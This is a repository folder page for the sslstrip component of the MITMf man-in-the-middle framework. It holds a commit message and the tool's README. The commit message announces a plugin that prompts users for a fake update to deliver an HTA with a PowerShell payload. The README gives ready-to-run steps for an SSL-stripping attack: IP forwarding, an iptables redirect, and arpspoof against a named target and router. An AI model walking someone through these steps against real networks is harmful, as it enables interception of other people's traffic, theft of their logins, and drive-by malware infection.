MITMf/core/sslstrip
byt3bl33d3r 5e2f30fb89 This is a vewwwy big commit
- The inject plugin now uses beautifulsoup4 to actually parse HTML and add content to it as supposed to using regexes
- The logging of the whole framework has been compleatly overhauled
- plugindetect.js now includes os.js from the metasploit framework for os and browser detection, let's us fingerprint hosts even if UA is lying!
- New plugin HTA Drive-by has been added, prompts the user for a plugin update and makes them download an hta app which contains a powershell payload
- the API of the plugins has been simplified
- Improvements and error handling to user-agent parsing
- Some misc bugfixes
2015-07-18 20:14:07 +02:00
..
__init__.py Version bump 2015-03-30 18:04:24 +02:00
ClientRequest.py This is a vewwwy big commit 2015-07-18 20:14:07 +02:00
CookieCleaner.py Version bump 2015-03-30 18:04:24 +02:00
COPYING.sslstrip Version bump 2015-03-30 18:04:24 +02:00
DnsCache.py This is a vewwwy big commit 2015-07-18 20:14:07 +02:00
README.md Version bump 2015-03-30 18:04:24 +02:00
ServerConnection.py This is a vewwwy big commit 2015-07-18 20:14:07 +02:00
ServerConnectionFactory.py This is a vewwwy big commit 2015-07-18 20:14:07 +02:00
SSLServerConnection.py This is a vewwwy big commit 2015-07-18 20:14:07 +02:00
StrippingProxy.py Version bump 2015-03-30 18:04:24 +02:00
URLMonitor.py This is a vewwwy big commit 2015-07-18 20:14:07 +02:00

sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping attacks.

It requires Python 2.5 or newer, along with the 'twisted' python module.

Installing: * Unpack: tar zxvf sslstrip-0.5.tar.gz * Install twisted: sudo apt-get install python-twisted-web * (Optionally) run 'python setup.py install' as root to install, or you can just run it out of the directory.

Running: sslstrip can be run from the source base without installation.
Just run 'python sslstrip.py -h' as a non-root user to get the command-line options.

The four steps to getting this working (assuming you're running Linux) 
are:

1) Flip your machine into forwarding mode (as root):
   echo "1" > /proc/sys/net/ipv4/ip_forward

2) Setup iptables to intercept HTTP requests (as root):
   iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <yourListenPort>

3) Run sslstrip with the command-line options you'd like (see above).

4) Run arpspoof to redirect traffic to your machine (as root):
   arpspoof -i <yourNetworkdDevice> -t <yourTarget> <theRoutersIpAddress>

More Info: http://www.thoughtcrime.org/software/sslstrip/